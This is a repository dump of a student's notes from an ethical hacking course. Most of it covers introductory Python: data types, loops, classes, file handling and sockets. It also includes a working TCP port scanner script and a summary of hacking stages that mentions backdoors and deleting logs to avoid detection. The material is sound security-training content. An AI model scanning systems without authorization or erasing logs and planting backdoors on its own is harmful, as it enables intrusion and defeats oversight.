def nl():
    print('\n')

nl()
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/06. Boolean Expressions and Relational Operators.md:
--------------------------------------------------------------------------------
# Boolean Expressions and Relational Operators
> 14.11.2023
---

Boolean expressions are expressions that are either *True or False*. They are used in *conditional statements and logical operations* to make decisions based on the *truth or falsity* of certain conditions. Relational operators are used to *compare values and create boolean expressions*. Here's an explanation of boolean expressions and relational operators in Python:

**Relational Operators:**
Python provides relational operators to compare values:

- Equality (`==`): Checks if *two values are equal.*
- Inequality (`!=`): Checks if *two values are not equal.*
- Greater than (`>`): Checks if the *left value is greater than the right value.*
- Less than (`<`): Checks if the *left value is less than the right value.*
- Greater than or equal to (`>=`): Checks if the *left value is greater than or equal to the right value.*
- Less than or equal to (`<=`): Checks if the *left value is less than or equal to the right value.*

**Boolean Expressions:**
Boolean expressions are formed by *combining relational expressions using logical operators.* The logical operators in Python are:

- Logical *AND* (`and`): Returns True if both operands are True.
- Logical *OR* (`or`): Returns True if at least one operand is True.
- Logical *NOT* (`not`): Negates the value of the operand.
23 | 24 | **Examples:** 25 | ```python 26 | x = 5 27 | y = 10 28 | 29 | # Relational operators 30 | print(x == y) # Output: False 31 | print(x < y) # Output: True 32 | 33 | # Boolean expressions 34 | print(x < y and y > 0) # Output: True 35 | print(x < y or y < 0) # Output: True 36 | print(not (x == y)) # Output: True 37 | ``` 38 | 39 | ```python 40 | # Boolean expressions (True or False) 41 | print("Boolean expressions:") 42 | 43 | bool1 = True 44 | bool2 = 3*3 == 9 45 | bool3 = False 46 | bool4 = 3*3 != 9 47 | 48 | print(bool1, bool2, bool3, bool4) 49 | print(type(bool1)) 50 | 51 | bool5 = "True" 52 | print(type(bool5)) 53 | 54 | nl() 55 | 56 | # Relational and Boolean operators 57 | greater_than = 7 > 5 58 | less_than = 5 < 7 59 | greater_than_equal_to = 7 >= 7 60 | less_than_equal_to = 7 <= 7 61 | 62 | test_and = True and True # True 63 | test_and2 = True and False # False 64 | test_or = True or True # True 65 | test_or2 = True or False # True 66 | 67 | test_not = not True # False 68 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/07. Conditional Statements.md: -------------------------------------------------------------------------------- 1 | # Conditional Statements 2 | > 17.11.2023 3 | --- 4 | 5 | **if Statement:** 6 | - Executes a block of code if a condition is true. 7 | 8 | ```python 9 | x = 5 10 | if x > 0: 11 | print("x is positive") 12 | ``` 13 | 14 | **if-else Statement:** 15 | - Chooses between two code blocks based on whether a condition is true or false. 16 | 17 | ```python 18 | x = 5 19 | if x > 0: 20 | print("x is positive") 21 | else: 22 | print("x is not positive") 23 | ``` 24 | 25 | **if-elif-else Statement:** 26 | - Checks multiple conditions and executes corresponding code blocks. 
27 | 28 | ```python 29 | x = 5 30 | if x > 0: 31 | print("x is positive") 32 | elif x < 0: 33 | print("x is negative") 34 | else: 35 | print("x is zero") 36 | ``` 37 | 38 | These statements help you make decisions and control program execution based on conditions. Here's an example: 39 | 40 | ```python 41 | #Conditional Statements 42 | def drink(money): 43 | if money >= 2: 44 | return "You've got yourself a drink!" 45 | else: 46 | return "No drink for you!" 47 | 48 | print(drink(3)) 49 | print(drink(1)) 50 | 51 | 52 | def alcohol(age, money): 53 | if(age >= 21) and (money >= 5): 54 | return "We're getting a drink!" 55 | elif (age >= 21) and (money < 5): 56 | return "Come back with more money." 57 | elif (age < 21) and (money >= 5): 58 | return "Nice try, kid!" 59 | else: 60 | return "You're too poor and too young!" 61 | 62 | print(alcohol(21, 5)) 63 | print(alcohol(21, 4)) 64 | print(alcohol(20, 5)) 65 | print(alcohol(20, 4)) 66 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/08. Lists.md: -------------------------------------------------------------------------------- 1 | # Lists 2 | > 17.11.2023 3 | --- 4 | 5 | **List Creation:** 6 | - To make a list, put comma-separated values inside square brackets. 7 | 8 | ```python 9 | fruits = ["apple", "banana", "orange"] 10 | ``` 11 | 12 | **List Access:** 13 | - Retrieve individual elements using indexing (starts from 0). 14 | 15 | ```python 16 | print(fruits[0]) # Output: "apple" 17 | print(fruits[2]) # Output: "orange" 18 | ``` 19 | 20 | **List Modification:** 21 | - Lists are mutable; you can change elements by assigning new values or using methods. 
22 | 23 | ```python 24 | fruits[1] = "grape" # Modify an element 25 | fruits.append("kiwi") # Add an element to the end 26 | fruits.remove("apple") # Remove an element 27 | ``` 28 | 29 | **List Operations:** 30 | - Perform various operations like concatenation, length retrieval, slicing, and iteration. 31 | 32 | ```python 33 | fruits = ["apple", "banana", "orange"] 34 | fruits2 = ["grape", "kiwi"] 35 | 36 | combined = fruits + fruits2 37 | print(combined) # Output: ["apple", "banana", "orange", "grape", "kiwi"] 38 | 39 | print(len(fruits)) # Output: 3 40 | 41 | sublist = fruits[1:3] 42 | print(sublist) # Output: ["banana", "orange"] 43 | 44 | for fruit in fruits: 45 | print(fruit) # Output: "apple", "banana", "orange" 46 | ``` 47 | 48 | Lists are powerful tools for managing and processing collections of items in Python. Here's an example using movies: 49 | 50 | ```python 51 | #Lists - Have brackets [] 52 | movies = ["When Harry Met Sally", "The Hangover", "The Perks of Being a Wallflower", "The Exorcist"] 53 | 54 | print(movies[1]) # Returns the second item in the list - index / indices 55 | print(movies[0]) # Returns the first item in the list 56 | print(movies[1:3]) # Returns the first number given until right before the last number given 57 | print(movies[1:4]) # Returns all 58 | print(movies[1:]) # Returns everything from the number to the end of the list 59 | print(movies[:1]) # Everything before 1 60 | print(movies[:2]) 61 | print(movies[-1]) # Grabs the last item 62 | 63 | print(len(movies)) # Counts items in the list 64 | movies.append("JAWS") 65 | print(movies) # Appends to the end of the list 66 | 67 | movies.insert(2, "Hustle") 68 | print(movies) 69 | 70 | movies.pop() # Removes the last item 71 | print(movies) 72 | 73 | movies.pop(0) # Removes the first item 74 | print(movies) 75 | 76 | amber_movies = ['Just Go With It', '50 First Dates'] 77 | our_favorite_movies = movies + amber_movies 78 | print(our_favorite_movies) 79 | 80 | grades = [["Bob", 82], 
["Alice", 90], ["Jeff", 73]] 81 | bobs_grade = grades[0][1] 82 | print(bobs_grade) 83 | grades[0][1] = 83 84 | print(bobs_grade) 85 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/09. Tuples.md: -------------------------------------------------------------------------------- 1 | # Tuples 2 | > 17.11.2023 3 | --- 4 | 5 | In Python, a tuple is an ordered collection of elements, similar to a list. However, unlike lists, tuples are immutable, meaning their elements cannot be modified once they are created: 6 | 7 | **Tuple Creation:** 8 | - To make a tuple, enclose comma-separated values within parentheses ( ). 9 | 10 | ```python 11 | fruits = ("apple", "banana", "orange") 12 | ``` 13 | 14 | **Tuple Access:** 15 | - Retrieve individual elements using indexing, starting from 0. 16 | 17 | ```python 18 | print(fruits[0]) # Output: "apple" 19 | print(fruits[2]) # Output: "orange" 20 | ``` 21 | 22 | **Tuple Immutability:** 23 | - Tuples are immutable; you can't change their elements after creation. 24 | 25 | ```python 26 | fruits[1] = "grape" # This will raise an error 27 | ``` 28 | 29 | **Tuple Operations:** 30 | - Though immutable, you can still perform certain operations like concatenation and length retrieval. 
31 | 32 | ```python 33 | fruits = ("apple", "banana", "orange") 34 | fruits2 = ("grape", "kiwi") 35 | 36 | combined = fruits + fruits2 37 | print(combined) # Output: ("apple", "banana", "orange", "grape", "kiwi") 38 | 39 | print(len(fruits)) # Output: 3 40 | 41 | subtuple = fruits[1:3] 42 | print(subtuple) # Output: ("banana", "orange") 43 | ``` 44 | 45 | ```python 46 | # Tuples - Do not change, () 47 | grades = ("a", "b", "c", "d", "f") 48 | 49 | # grades.pop, grades.append won't work - not mutable 50 | 51 | print(grades[1]) 52 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/10. Looping.md: -------------------------------------------------------------------------------- 1 | # Looping 2 | > 17.11.2023 3 | --- 4 | 5 | 6 | **for Loop:** 7 | - Iterates over a sequence (list, tuple, string, or range). 8 | - Executes a block of code for each item in the sequence. 9 | 10 | ```python 11 | fruits = ["apple", "banana", "orange"] 12 | for fruit in fruits: 13 | print(fruit) 14 | ``` 15 | 16 | Output: 17 | ``` 18 | apple 19 | banana 20 | orange 21 | ``` 22 | 23 | **while Loop:** 24 | - Repeatedly executes a block of code while a condition is true. 25 | - Continues until the condition becomes false. 26 | 27 | ```python 28 | count = 0 29 | while count < 5: 30 | print(count) 31 | count += 1 32 | ``` 33 | 34 | Output: 35 | ``` 36 | 0 37 | 1 38 | 2 39 | 3 40 | 4 41 | ``` 42 | 43 | **break and continue Statements:** 44 | - `break` exits the loop prematurely. 45 | - `continue` skips the current iteration and moves to the next. 

```python
# For loops - start to finish of an iterable
vegetables = ["cucumber", "spinach", "cabbage"]
for x in vegetables:
    print(x)

# While loops - execute as long as the condition is true
i = 1
while i < 10:
    print(i)
    i += 1
```

/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/11. Advanced Strings.md:
# Advanced Strings
> 17.11.2023
---

A string (str) represents a sequence of characters enclosed in single (' ') or double (" ") quotes. Strings are immutable:

**Creation:**
```python
my_string = 'Hello, World!'  # or my_string = "Hello, World!"
```

**Accessing Characters:**
- Indexing starts from 0.
```python
print(my_string[0])  # Outputs 'H'
```

**String Concatenation:**
- Use + to join strings.
```python
greeting = 'Hello' + ' ' + 'World!'  # Results in 'Hello World!'
```

**String Length:**
- `len()` function determines the string length.
```python
print(len(my_string))  # Outputs the length of the string.
```

**String Slicing:**
- Extract a substring using slicing.
```python
substring = my_string[7:12]  # Extracts 'World'
```

**String Methods:**
- Built-in methods like `upper()`, `lower()`, `strip()`, `split()`, `replace()`.
```python
print(my_string.upper())  # Outputs 'HELLO, WORLD!'
```

**String Formatting:**
- Embed values within a string.
```python
name = 'Alice'
age = 30
print("My name is %s and I'm %d years old." % (name, age))
# Output: My name is Alice and I'm 30 years old.
```

**Advanced String Operations:**
```python
my_name = "Heath"
print(my_name[0])   # Outputs 'H'
print(my_name[-1])  # Outputs the last letter

sentence = "This is a sentence."
print(sentence[:4])  # Outputs 'This'

print(sentence.split())  # Splits on whitespace
sentence_split = sentence.split()
sentence_join = ' '.join(sentence_split)  # Joins with a space
print(sentence_join)

quote = "He said, \"give me all your money\""
print(quote)

too_much_space = "        hello        "
print(too_much_space.strip())

print("A" in "Apple")  # Returns True
print("a" in "Apple")  # Returns False (case-sensitive)

letter = "A"
word = "Apple"
print(letter.lower() in word.lower())  # Case-insensitive check

movie = "The Hangover"
print("My favorite movie is {}.".format(movie))
print("My favorite movie is %s" % movie)
print(f"My favorite movie is {movie}")
```

/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/12. Dictionaries.md:
# Dictionaries
> 19.11.2023
---

A dictionary stores key-value pairs. It allows one to organize and manipulate data efficiently:

**Dictionary Creation:**
```python
student = {
    "name": "Alice",
    "age": 20,
    "major": "Computer Science"
}
```

**Dictionary Access:**
- Access values using keys.
```python
print(student["name"])  # Outputs "Alice"
print(student["age"])   # Outputs 20
```

**Dictionary Modification:**
- Mutable; modify values by assigning new values to keys.
```python
student["age"] = 21         # Modifying a value
student["city"] = "London"  # Adding a new key-value pair
```

**Dictionary Operations:**
- Length: `len()` returns the number of key-value pairs.
- Iteration: Loop through keys, values, or key-value pairs.
- Deletion: Use `del` to remove a key-value pair.
```python
print(len(student))  # Outputs 3

for key in student:
    print(key, student[key])  # Outputs "name Alice", "age 20", "major Computer Science"

del student["age"]  # Deleting a key-value pair
```

**Advanced Dictionary Operations:**
```python
drinks = {"White Russian": 7, "Old Fashion": 10, "Lemon Drop": 8}
print(drinks)

employees = {"Finance": ["Bob", "Linda", "Tina"], "IT": ["Gene", "Louise", "Teddy"], "HR": ["Jimmy Jr.", "Mort"]}
employees['Legal'] = ["Mr. Frond"]
print(employees)

employees.update({"Sales": ["Andie", "Ollie"]})
print(employees)

drinks['White Russian'] = 8
print(drinks)

print(drinks.get("White Russian"))  # get() returns None instead of raising KeyError for a missing key
```

/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/13. Importing Modules.md:
# Importing Modules
> 19.11.2023
---

**Importing Entire Modules:**
```python
import math

result = math.sqrt(25)
print(result)  # Outputs 5.0
```

**Importing Specific Functions or Variables:**
```python
from math import sqrt

result = sqrt(25)
print(result)  # Outputs 5.0
```

**Importing Modules with an Alias:**
```python
import math as m

result = m.sqrt(25)
print(result)  # Outputs 5.0
```

**Importing All Functions and Variables:**
```python
from math import *

result = sqrt(25)
print(result)  # Outputs 5.0
```

**Advanced Importing:**
```python
import sys  # System functions and parameters
from datetime import datetime as dt  # Import with alias

print(sys.version)
print(dt.now())
```

/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/14. Sockets.md:
# Sockets
> 19.11.2023
---

Sockets are essential for networking, enabling communication between computers over a network:

**Socket Creation:**
```python
import socket

# Create a TCP socket
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Create a UDP socket
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
```

**Socket Communication:**
Methods for connection, data sending, and receiving:
```python
socket.connect(address)    # Establishes a connection to a remote address.
socket.bind(address)       # Binds the socket to a specific address and port.
socket.listen(backlog)     # Listens for incoming connections on a TCP socket.
socket.accept()            # Accepts an incoming connection and returns a new socket object for communication.
socket.send(data)          # Sends data over the socket.
socket.recv(buffer_size)   # Receives data from the socket.
```

**TCP Server Example:**
```python
import socket

# Create a TCP socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to a specific address and port
server_address = ('localhost', 1234)
server_socket.bind(server_address)

# Listen for incoming connections
server_socket.listen(5)

while True:
    # Accept a client connection
    client_socket, client_address = server_socket.accept()

    # Receive and send data
    data = client_socket.recv(1024)
    client_socket.send(b"Received: " + data)

    # Close the client socket
    client_socket.close()
```

Socket programming in Python facilitates the creation of client-server and networked applications, offering flexibility in communication over networks using protocols like TCP and UDP. The socket module provides extensive functionality for efficient network communication.

```python
#!/bin/python3
# SOCKETS - Sockets can be used to connect two nodes together.
import socket

HOST = '127.0.0.1'
PORT = 7777

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # AF_INET is IPv4, SOCK_STREAM is TCP
s.connect((HOST, PORT))  # a listener must already be running on HOST:PORT
s.close()
```

/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/15. Building a Port Scanner.md:
# Building a Port Scanner
> 19.11.2023
---

1. **Importing Modules:**
   - `sys`: Provides access to some variables used or maintained by the Python interpreter and to functions that interact with the interpreter.
   - `socket`: Provides low-level networking interfaces.
   - `datetime`: A module to work with dates and times.

   ```python
   import sys
   import socket
   from datetime import datetime
   ```

2. **Define Target:**
   - The script checks if the correct number of command-line arguments is provided. If yes, it retrieves the target IP address using `socket.gethostbyname()`.

   ```python
   if len(sys.argv) == 2:
       target = socket.gethostbyname(sys.argv[1])
   else:
       print("Invalid amount of arguments.")
       print("Syntax: python3 scanner.py <ip>")
       sys.exit(1)  # stop here; otherwise target is undefined below
   ```

3. **Print Banner:**
   - A banner is printed to the console, indicating the start of the scan along with the target and the current time.

   ```python
   print("-" * 50)
   print("Scanning target " + target)
   print("Time started: " + str(datetime.now()))
   print("-" * 50)
   ```

4. **Port Scanning:**
   - The script then attempts to connect to each port in the specified range (50 to 85) using a `for` loop.
   - `socket.socket()`: Creates a new socket object.
   - `socket.setdefaulttimeout(1)`: Sets a default timeout for the socket operations to 1 second.
   - `s.connect_ex((target, port))`: Attempts to connect to the target on the specified port. Returns 0 if successful (port open) and 1 if unsuccessful (port closed).

   ```python
   try:
       socket.setdefaulttimeout(1)  # applies to every socket created after this call
       for port in range(50, 85):
           s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
           result = s.connect_ex((target, port))
           if result == 0:
               print("Port {} is open".format(port))
           s.close()

   except KeyboardInterrupt:
       print("\nExiting program.")
       sys.exit()

   except socket.gaierror:
       print("Hostname could not be resolved.")
       sys.exit()

   except socket.error:
       print("Could not connect to server.")
       sys.exit()
   ```

The script handles keyboard interrupts and socket-related exceptions, ensuring graceful exits and informative messages. It prints whether each scanned port is open or closed.

```python
#!/bin/python3

import sys
import socket
from datetime import datetime

# Define our target
if len(sys.argv) == 2:
    target = socket.gethostbyname(sys.argv[1])  # Translate hostname to IPv4
else:
    print("Invalid amount of arguments.")
    print("Syntax: python3 scanner.py <ip>")
    sys.exit(1)  # without this the banner below would fail with an undefined target

# Add a pretty banner
print("-" * 50)
print("Scanning target " + target)
print("Time started: " + str(datetime.now()))
print("-" * 50)

try:
    socket.setdefaulttimeout(1)  # set once, before any socket is created, so every probe times out after 1s
    for port in range(50, 85):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        result = s.connect_ex((target, port))  # error indicator: 0 means connected (port open), anything else means the connect failed
        if result == 0:
            print("Port {} is open".format(port))
        s.close()

except KeyboardInterrupt:
    print("\nExiting program.")
    sys.exit()

except socket.gaierror:
    print("Hostname could not be resolved.")
    sys.exit()

except socket.error:
    print("Could not connect to server.")
    sys.exit()
```
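As an added example (not part of the original notes or the course code), the following ties the Sockets note and the port scanner together: it runs the page's bind/listen/accept/recv/send server in a background thread on a loopback port, talks to it with a client that reads until the peer closes, and probes ports with `connect_ex()`, reporting the errno behind a non-zero result. `HOST`, the function names and the "one connection per probe" arrangement are the example's own assumptions.

```python
import errno
import socket
import threading
from contextlib import closing

HOST = "127.0.0.1"  # loopback only: both ends of the exchange live in this process (assumption)


def start_echo_server(connections=1):
    """Run the page's bind -> listen -> accept -> recv -> send server on a loopback port.

    It serves exactly `connections` clients in a background thread and returns the
    port the OS picked, so a client in the same process knows where to connect.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))  # port 0 asks the OS for any free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        with closing(srv):
            for _ in range(connections):
                client, _addr = srv.accept()
                with closing(client):
                    data = client.recv(1024)  # one recv, as on the page: fine for short messages
                    if data:  # a bare connect-and-close probe sends nothing
                        client.sendall(b"Received: " + data)

    threading.Thread(target=serve, daemon=True).start()
    return port


def echo_client(port, message, timeout=2.0):
    """Connect to the echo server, send `message` and return the complete reply."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)  # never block forever on a peer that stays silent
        s.connect((HOST, port))
        s.sendall(message)  # sendall() loops until every byte is written; send() may not
        s.shutdown(socket.SHUT_WR)  # our half is done; the server sees EOF after our data
        chunks = []
        while True:  # recv() returns whatever has arrived so far, not "one message"
            chunk = s.recv(1024)
            if not chunk:  # empty bytes means the peer closed its side
                break
            chunks.append(chunk)
        return b"".join(chunks)


def probe_port(target, port, timeout=1.0):
    """Classify one TCP port from the connect_ex() result.

    connect_ex() returns 0 when the handshake completes; otherwise it returns the
    errno of the failed connect(): ECONNREFUSED means the host answered with a RST
    (nothing listening there), anything else means no usable answer came back.
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)  # per-socket timeout, set before the connect attempt
        rc = s.connect_ex((target, port))
    if rc == 0:
        return "open"
    if rc == errno.ECONNREFUSED:
        return "closed"
    return "no response (%s)" % errno.errorcode.get(rc, rc)


def scan_ports(target, ports, timeout=1.0):
    """Return {port: state} for each port: the page's loop as a reusable function."""
    return {port: probe_port(target, port, timeout) for port in ports}


def free_port():
    """Bind an ephemeral port and release it again: nothing listens there afterwards."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind((HOST, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port = start_echo_server(connections=2)  # one connection for the probe, one for the echo
    for p, state in sorted(scan_ports(HOST, [port, free_port()]).items()):
        print("Port %d is %s" % (p, state))
    print(echo_client(port, b"hello"))
```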
Course/05. Introduction to Python/16. User Input.md: -------------------------------------------------------------------------------- 1 | #  User Input 2 | > 20.11.2023 3 | --- 4 | 5 | ```python 6 | # USER INPUT 7 | 8 | # Example 1: Greeting the user by taking their name as input 9 | name = input("Enter your name: ") 10 | print("Hello, " + name + "!") 11 | 12 | # Example 2: Getting and manipulating the user's age 13 | age = input("Enter your age: ") 14 | age = int(age) # Convert input to an integer 15 | print("You will be " + str(age + 1) + " next year.") 16 | 17 | # Example 3: Performing a calculation based on user input for numbers and an operator 18 | x = float(input("Give me a number: ")) 19 | o = input("Give me an operator: ") 20 | y = float(input("Give me yet another number: ")) 21 | 22 | # Handling different operators and printing the result 23 | if o == "+": 24 | print(x + y) 25 | elif o == "-": 26 | print(x - y) 27 | elif o == "/": 28 | print(x / y) 29 | elif o == "*": 30 | print(x * y) 31 | elif o == "**": 32 | print(x ** y) 33 | else: 34 | print("Unknown operator.") 35 | ``` 36 | 37 | This Python code showcases user input examples, including taking the user's name, age, and performing calculations based on numeric input and operators. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/17. Reading and Writing Files.md: -------------------------------------------------------------------------------- 1 | # Reading and Writing Files 2 | > 20.11.2023 3 | --- 4 | 5 | **Reading Files:** 6 | - Open a file in read mode with `open("example.txt", "r")`. 7 | - Use methods like `read()`, `readline()`, or `readlines()` to get file contents. 8 | - `read()`: Retrieves the entire file content as a string. 9 | - `readline()`: Gets a single line from the file. 10 | - `readlines()`: Gets all lines as a list. 
11 | 12 | **Example:** 13 | ```python 14 | with open("example.txt", "r") as file: 15 | content = file.read() 16 | line = file.readline() 17 | lines = file.readlines() 18 | ``` 19 | 20 | **Writing Files:** 21 | - Open a file in write mode with `open("example.txt", "w")`. 22 | - Use the `write()` method to add content to the file. 23 | 24 | **Example:** 25 | ```python 26 | with open("example.txt", "w") as file: 27 | file.write("Hello, World!\n") 28 | file.write("This is a new line.") 29 | ``` 30 | 31 | **Appending to Files:** 32 | - Open a file in append mode with `open("example.txt", "a")`. 33 | - Use `write()` to add content without overwriting existing content. 34 | 35 | Example: 36 | ```python 37 | with open("example.txt", "a") as file: 38 | file.write("\nThis is appended content.") 39 | ``` 40 | 41 | Reading and writing files in Python is crucial for managing external data and storing program outputs. Always close files to prevent memory leaks and maintain data integrity. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/18. Classes and Objects.md: -------------------------------------------------------------------------------- 1 | # Classes and Objects 2 | > 20.11.2023 3 | --- 4 | 5 | **Classes and Objects in Python:** 6 | In Python, classes and objects are fundamental to object-oriented programming (OOP), providing a structure for code and defining custom data types. 7 | 8 | **Classes:** 9 | - A *class* is a blueprint or template for creating objects, defining their properties (attributes), and behaviors (methods). 
10 | 11 | Example: 12 | ```python 13 | class Dog: 14 | def __init__(self, name, age): 15 | self.name = name 16 | self.age = age 17 | 18 | def bark(self): 19 | print("Woof!") 20 | 21 | def display_info(self): 22 | print("Name:", self.name) 23 | print("Age:", self.age) 24 | ``` 25 | 26 | **Objects:** 27 | - An object is an instance of a class, created based on the class blueprint. 28 | - Each object has its own set of attributes and can invoke methods defined in the class. 29 | 30 | **Example:** 31 | ```python 32 | dog1 = Dog("Buddy", 5) 33 | dog2 = Dog("Max", 3) 34 | 35 | dog1.bark() # Output: "Woof!" 36 | dog1.display_info() # Output: "Name: Buddy", "Age: 5" 37 | 38 | dog2.bark() # Output: "Woof!" 39 | dog2.display_info() # Output: "Name: Max", "Age: 3" 40 | ``` 41 | 42 | **Employees Class Example:** 43 | ```python 44 | class Employees: 45 | def __init__(self, name, department, role, salary, years_employed): 46 | self.name = name 47 | self.department = department 48 | self.role = role 49 | self.salary = salary 50 | self.years_employed = years_employed 51 | 52 | def eligible_for_retirement(self): 53 | return self.years_employed >= 20 54 | 55 | # Example usage: 56 | e1 = Employees("Bob", "Sales", "Director of Sales", 100000, 20) 57 | e2 = Employees("Linda", "Executive", "CIO", 150000, 10) 58 | 59 | print(e1.name) 60 | print(e2.role) 61 | print(e1.eligible_for_retirement()) 62 | ``` 63 | 64 | These examples showcase how classes and objects are pivotal in OOP, facilitating code organization, data encapsulation, and the creation of reusable entities. They enable the modeling of real-world entities, the definition of custom data types, and the construction of complex systems using principles like inheritance, polymorphism, and encapsulation. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/19. 
Building a Shoe Budget Tool.md: -------------------------------------------------------------------------------- 1 | # Building a Shoe Budget Tool 2 | > 20.11.2023 3 | --- 4 | 5 | ```python 6 | # Defining a Shoes class for budgeting and purchasing shoes 7 | class Shoes: 8 | # Constructor to initialize object properties (name and price) 9 | def __init__(self, name, price): 10 | self.name = name 11 | # Convert the price to a float for consistency 12 | self.price = float(price) 13 | 14 | # Method to check if the budget is a valid number 15 | def budget_check(self, budget): 16 | # Check if the budget is not an instance of int or float 17 | if not isinstance(budget, (int, float)): 18 | # Print an error message and exit the program 19 | print('Invalid entry. Please enter a number.') 20 | exit() 21 | 22 | # Method to calculate the change after a purchase 23 | def change(self, budget): 24 | return budget - self.price 25 | 26 | # Method to simulate the process of buying shoes 27 | def buy(self, budget): 28 | # Check if the budget is a valid number 29 | self.budget_check(budget) 30 | 31 | # Check if the budget is enough to buy the shoes 32 | if budget >= self.price: 33 | # Print a message indicating the purchase 34 | print(f'You can buy some {self.name}') 35 | 36 | # Check if the budget exactly matches the price 37 | if budget == self.price: 38 | print('You have exactly enough money for these shoes.') 39 | else: 40 | # Print the change after the purchase 41 | print(f'You can buy these shoes and have ${self.change(budget)} left over') 42 | 43 | # Exit the program with a thank-you message 44 | exit('Thanks for using our shoe budget app!') 45 | 46 | # Importing the Shoes class for use 47 | from Shoes import Shoes 48 | 49 | # Creating instances of the Shoes class with different shoes and prices 50 | low = Shoes('And 1s', 30) 51 | medium = Shoes('Air Force 1s', 120) 52 | high = Shoes('Off Whites', 400) 53 | 54 | try: 55 | # Getting the user's shoe budget as a floating-point 
number 56 | shoe_budget = float(input('What is your shoe budget? ')) 57 | except ValueError: 58 | # Exit the program if the user enters a non-number 59 | exit('Please enter a number') 60 | 61 | # Iterating through each shoe and simulating the purchase 62 | for shoes in [high, medium, low]: 63 | shoes.buy(shoe_budget) 64 | ``` 65 | 66 | ```python 67 | # Opening a file named 'months.txt' for reading 68 | months = open('months.txt') 69 | 70 | # Printing information about the file 71 | print(months) 72 | print(months.mode) 73 | print(months.readable()) 74 | 75 | # Closing the file 76 | months.close() 77 | 78 | # Attempting to read from the closed file (will result in an error) 79 | print(months.read()) 80 | 81 | # Reading a single line from the file 82 | print(months.readline()) 83 | 84 | # Reading the next line from the file 85 | print(months.readline()) 86 | 87 | # Reading all remaining lines and printing them as an array 88 | print(months.readlines()) 89 | 90 | # Attempting to read more lines (will print an empty array) 91 | print(months.readlines()) 92 | 93 | # Setting the file cursor back to the beginning 94 | months.seek(0) 95 | 96 | # Reading all lines again and printing them as an array 97 | print(months.readlines()) 98 | 99 | # Setting the file cursor back to the beginning 100 | months.seek(0) 101 | 102 | # Iterating through each line in the file and printing it 103 | for month in months: 104 | print(month) 105 | 106 | # Setting the file cursor back to the beginning 107 | months.seek(0) 108 | 109 | # Iterating through each line, stripping whitespace, and printing it 110 | for month in months: 111 | print(month.strip()) 112 | 113 | # Opening a file named 'days.txt' for writing 114 | days = open("days.txt", "w") 115 | 116 | # Writing the string "Monday" to the file 117 | days.write("Monday") 118 | 119 | # Closing the file 120 | days.close() 121 | 122 | # Opening the same file for writing again (overwriting the existing content) 123 | days = open("days.txt", "w") 

# Writing the string "\nTuesday" (the file was truncated on re-open, so "Monday" is gone)
days.write("\nTuesday")

# Closing the file
days.close()

# Opening the file in append mode
days = open("days.txt", "a")

# Writing the string "\nWednesday" to the file (appending to the existing content)
days.write("\nWednesday")

# Closing the file
days.close()
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/06. The Ethical Hacker Methodology/00. Image/The Five Stages of Ethical Hacking 01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/06. The Ethical Hacker Methodology/00. Image/The Five Stages of Ethical Hacking 01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/06. The Ethical Hacker Methodology/01. The Five Stages of Ethical Hacking.md:
--------------------------------------------------------------------------------
# The Five Stages of Ethical Hacking
> 14.11.2023
---

![[The Five Stages of Ethical Hacking 01.png]]

1. **Reconnaissance:**
   - *What?* Gathering information about the target system or network.
   - *How?* Passive techniques such as checking public information, browsing websites, and looking at DNS records.
   - *Why?* To understand the target and spot potential entry points.

2. **Scanning:**
   - *What?* Actively probing the target to find open ports, services, and vulnerabilities.
   - *How?* Using tools for port scanning, network mapping, and vulnerability scanning.
   - *Why?* Identifying weaknesses that could be exploited.

3. **Gaining Access:**
   - *What?* Trying to get unauthorized access to the target.
   - *How?* Exploiting vulnerabilities found earlier, using techniques like password cracking or social engineering.
   - *Why?* To simulate a real attack and assess potential risks.

4. **Maintaining Access:**
   - *What?* After gaining access, the focus is on keeping it.
   - *How?* Bypassing security, setting up backdoors, and maintaining persistent access.
   - *Why?* Mimicking a real attacker's actions to understand the impact.

5. **Covering Tracks:**
   - *What?* Removing any signs of the ethical hacking activity.
   - *How?* Deleting logs, modifying or removing files, and restoring the system to its original state.
   - *Why?* Ensuring the ethical hacking goes undetected, leaving no evidence.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 01.png:
--------------------------------------------------------------------------------
